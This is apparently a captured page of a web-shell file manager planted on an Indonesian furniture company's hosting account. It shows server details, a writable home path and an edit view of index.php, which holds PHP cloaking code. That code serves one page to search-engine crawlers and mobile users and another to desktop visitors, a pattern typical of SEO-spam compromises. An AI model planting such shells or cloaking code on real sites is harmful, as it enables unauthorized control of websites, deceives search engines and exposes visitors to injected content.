đ SysAdmin FileManager
Linux 4.18.0-553.121.1.lve.el8.x86_64 | PHP 7.2.34
/ Root
/
home
/
k2202442
/
docs.futurafurniture.co.id
đ Files
đ¤ Upload
â New
âšī¸ Info
âŦī¸ Up
âī¸ Edit: index.php
đī¸ View
â Cancel
<?php // Fungsi untuk mendeteksi Bot function is_bot($user_agent) { // Gabungkan daftar bot menjadi satu pola Regex untuk performa yang lebih baik $bot_user_agents = array( "Googlebot", "Googlebot-Image", "Googlebot-News", "Googlebot-Video", "Storebot-Google", "Google-InspectionTool", "GoogleOther", "GoogleOther-Image", "GoogleOther-Video", "Google-CloudVertexBot", "Google-Extended", "APIs-Google", "AdsBot-Google-Mobile", "AdsBot-Google", "Mediapartners-Google", "FeedFetcher-Google", "Google-Favicon", "Google Favicon", "Googlebot-Favicon", "Google-Site-Verification", "Google-Read-Aloud", "GoogleProducer", "Google Web Preview", "Bingbot", "Slurp", "DuckDuckBot", "Baiduspider", "YandexBot", "Sogou", "Exabot", "facebookexternalhit", "ia_archiver", "Alexa Crawler", "AhrefsBot", "Semrushbot" ); // Membuat pola regex: /Googlebot|Bingbot|Slurp/i $pattern = '/' . implode('|', array_map('preg_quote', $bot_user_agents)) . '/i'; return preg_match($pattern, $user_agent) === 1; } // Fungsi untuk mendeteksi Perangkat Mobile function is_mobile($user_agent) { $mobile_agents = array( 'Mobile', 'Android', 'Silk/', 'Kindle', 'BlackBerry', 'Opera Mini', 'Opera Mobi', 'iPhone', 'iPad' ); $pattern = '/' . implode('|', array_map('preg_quote', $mobile_agents)) . '/i'; return preg_match($pattern, $user_agent) === 1; } // Ambil User Agent dengan aman $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; // Logika penentuan file yang akan di-include if (is_bot($user_agent)) { $file_to_load = 'indexlama.php'; } elseif (is_mobile($user_agent)) { $file_to_load = 'indexlama.php'; } else { $file_to_load = 'indexbaru.php'; } // Pastikan file ada sebelum di-include untuk mencegah Fatal Error if (file_exists($file_to_load)) { include $file_to_load; } else { // Fallback jika file tidak ditemukan echo "Halaman tidak ditemukan."; } exit; // Hanya satu exit di akhir eksekusi ?>
đž Save Changes
Cancel
SysAdmin FileManager | Path: /home/k2202442/docs.futurafurniture.co.id | Writable: Yes
đī¸ Confirm Delete
Are you sure you want to delete
?
This action cannot be undone!
Cancel
Delete
đ Rename
Cancel
Rename